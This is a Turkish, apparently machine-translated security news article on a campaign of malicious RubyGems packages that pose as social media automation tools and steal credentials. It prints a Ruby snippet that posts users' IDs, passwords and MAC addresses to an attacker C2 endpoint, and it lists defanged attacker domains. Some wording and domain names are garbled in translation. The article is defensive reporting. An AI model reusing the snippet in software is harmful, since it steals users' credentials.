Tehdit aktörleri, kötü niyetli kodları meşru Rubygems paketlerine kaydırmaya başladı ve 2023’ün başlarında infostaler’ları sosyal medya otomasyon araçları olarak gizledi.
Son iki yılda, Zon, Nowon, Kwonsoonje ve Soonje gibi takma adlar altında faaliyet gösteren saldırganlar, vaat edilen otomasyon özellikleri sunan 60’tan fazla mücevher yayınladılar – fitil gönderme, katılım amplifikasyonu ve backlink oluşturma – kimlik bilgilerini hasat ederken.
Bu paketler, Instagram, Twitter/X, Tiktok, WordPress, Telegram, Kakao ve Naver dahil olmak üzere platformları hedef alıyor ve 275.000’den fazla kez indirildi ve bireysel mücevherler kamu endeksinden kaldırıldıktan çok sonra makinelerde devam ediyor.
Socket.DEV analistleri, her kötü amaçlı mücevherin, Güney Koreli Grey-hat pazarlamacılarına hitap etmek için Koreli’de sunulan Glimmer-DSL-Libui ile inşa edilmiş hafif bir grafik arayüz içerdiğini belirtti.
Lansman üzerine kullanıcılar, otomasyon hizmetleri için meşru giriş kisvesi altında hesap kimlik bilgilerinin girilmesini teşvik ederek “아이디” (id) ve “비밀번호” (şifre) etiketli istemlerle karşılaşırlar.
Bu ayrıntıları resmi API’lara iletmek yerine, GEM’ler kimlik bilgilerini ve MAC adreslerini HTTP Post istekleri aracılığıyla saldırgan kontrollü sunuculara derhal birleştirir.
Domains Programzonzon[.]com, Appspace[.]KR, Marketingduo[.]ortak[.]Kr ve yedi1.iwinv[.]Net Ana Bilgisayar Bülten Board, çalıntı verileri sessizce kabul eden uç noktalar.
Kampanyanın evrimi, sofistike bir tedarik zinciri uzlaşması gösteriyor. Zon takma adı altında yayınlanan mücevherler genellikle günlerce, sadece sürekli entegrasyon önbelleklerinde yansıtılacak ve aynı aktör tarafından yeni isimler altında yeniden dağıtılacak “çekilir”.
.webp)
Periyodik altyapı değişimlerine rağmen, temel kimlik bilgisi çalma rutini değişmeden kalır ve enfekte konakların kalıcı parmak izini sağlar.
Bu yaklaşım, Grey-Hat pazarlamacılarının tek kullanımlık hesaplara güvenmesinden yararlanır; Mağdurlar nadiren ihlal edilen kimlikleri terk etmeyi ve şüphesiz operasyonlara devam etmeyi tercih ederler.
Enfeksiyon mekanizması ve eksfiltrasyon iş akışı
Kötü niyetli IUZ-64bit mücevher, küme boyunca paylaşılan enfeksiyon mekanizmasını örneklendirir.
GUI’sini sunduktan sonra, GEM, saldırganın C2 uç noktasına bir HTTP gönderisi gerçekleştirmeden önce kullanıcı giriş ve sistem tanımlayıcıları toplayan bir işlevi çağırır.
Aşağıdaki dezavantajlı yakut snippet, süreci göstermektedir:-
def login_check2(user_id, user_pw)
url="https://programzon.com/auth/program/signin" # C2 endpoint
headers = { 'Content-Type' => 'application/json' }
mac = get_mac_address()
body = {
username: user_id,
password: user_pw,
macAddress: mac,
program: '인스타 자동 포스팅(업로드) 프로그램'
}.to_json
response = HTTP.post(url, headers: headers, body: body)
payload = JSON.parse(response.body.to_s)
payload['status'] == "0" ? "0" : payload['message']
end.webp)
Kimlik bilgileri ve MAC adresleri C2 sunucusuna ulaştığında, saldırgan çeşitli mücevher kümelerindeki kurulumları ilişkilendirebilir, araç dağıtımı izleyebilir ve uzun vadeli erişimi koruyabilir.
Bu çift kullanımlı model, Grey-Hat pazarlamacılarına spam ve SEO kampanyalarını otomatikleştirmelerini sağlarken, hassas verileri tehdit oyuncusuna gizlice işlev görür.
Kampanya devam ettikçe, savunucular, geliştirme ortamlarına sızmadan önce bu kötü amaçlı paketleri tespit etmek ve engellemek için gerçek zamanlı bağımlılık tarama ve yükleme zamanı uyarılarını entegre etmelidir.
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın